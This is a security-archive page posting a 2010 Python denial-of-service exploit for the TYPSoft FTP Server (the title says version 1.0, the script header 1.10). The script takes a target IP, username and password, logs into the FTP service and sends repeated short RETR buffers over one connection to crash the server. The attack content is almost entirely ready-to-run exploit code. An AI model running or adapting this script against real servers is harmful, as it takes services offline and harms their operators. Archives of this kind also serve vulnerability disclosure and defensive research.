TYPSoft 1.0 RETR Denial Of Service

TYPSoft 1.0 RETR Denial Of Service: Posted May 14, 2010; Authored by Jeremiah Talamantes; TYPSoft version 1.0 RETR command denial of service exploit.; tags | exploit, denial of service; SHA-256 | 9e743870310a319983612a510077f27e93555ce348bf5017ef067515f6ee954b; Download | Favorite | View

TYPSoft 1.0 RETR Denial Of Service

# Exploit Title: TYPSoft FTP Server 1.10 RETR Command DoS
# Date: 5/13/2010
# Author: Jeremiah Talamantes (RedTeam Security)
# Software Link: http://sourceforge.net/projects/ftpserv/
# Version: 1.10
# Tested on: Windows XP, SP2 (EN)

# DESCRIPTION:
# This script exploits a weakness in the RETR command in TYPSoft v1.10
# It requires only a small buffer that is executed in succession within
# the same socket connection. 

#!/usr/bin/python
print "\n#################################################################"
print "##                      RedTeam Security                       ##"
print "##         TYPSoft FTP Server v1.10 RETR Command DoS           ##"
print "##                                                             ##"
print "##                     Jeremiah Talamantes                     ##"
print "##                   labs@redteamsecure.com                    ##"
print "################################################################# \n"

import socket
import sys

# Define the exploit's usage
def Usage():
    print ("Usage:  scriptname.py <IP address> <username> <password>\n")
    print ("\n\nCredit: Jeremiah Talamantes")
    print ("RedTeam Security : www.redteamsecure.com/labs\n")

# Buffer settings
# This works with a relatively small buffer
buffer= "A" * 30

def start(hostname, username, password):
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    try:
        sock.connect((hostname, 21))
    except:
        print ("Error: unable to connect to host")
        sys.exit(1)
    r=sock.recv(1024)
    print "[+] " + r
    #Send username to server
    sock.send("USER %s\r\n" %username)
    r=sock.recv(1024)
    # Send password to server
    sock.send("PASS %s\r\n" %password)
    r=sock.recv(1024)
    print "Sending the malicious chars..."
    # Send data to server
    sock.send("RETR %s\r\n" %buffer)
  
  # Repeat to overflow
    sock.send("USER %s\r\n" %username)
    r=sock.recv(1024)
    sock.send("PASS %s\r\n" %password)
    r=sock.recv(1024)
    sock.send("RETR %s\r\n" %buffer)
    sock.close()
  
if len(sys.argv) <> 4:
    Usage()
    sys.exit(1)
else:
    hostname=sys.argv[1]
    username=sys.argv[2]
    password=sys.argv[3]
    start(hostname,username,password)
    sys.exit(0)

# end

Top Authors In Last 30 Days

Red Hat 237 files
indoushka 157 files
Jay Turla 150 files
Ubuntu 68 files
h00die 54 files
juan vazquez 43 files
sinn3r 41 files
H D Moore 31 files
Karn Ganeshen 23 files
Pedro Ribeiro 22 files

File Archives

Systems

AIX (430)
Apple (2,104)
BSD (378)
CentOS (61)
Cisco (1,954)
Debian (7,119)
Fedora (1,693)
FreeBSD (1,247)
Gentoo (4,567)
HPUX (881)
iOS (387)
iPhone (108)
IRIX (220)
Juniper (71)
Linux (51,136)
Mac OS X (696)
Mandriva (3,105)
NetBSD (256)
OpenBSD (489)
RedHat (16,775)
Slackware (941)
Solaris (1,615)
SUSE (1,444)
Ubuntu (9,828)
UNIX (9,454)
UnixWare (188)
Windows (6,766)
Other

TYPSoft 1.0 RETR Denial Of Service

TYPSoft 1.0 RETR Denial Of Service

File Archive:

September 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

TYPSoft 1.0 RETR Denial Of Service

Share This

TYPSoft 1.0 RETR Denial Of Service

File Archive:

September 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems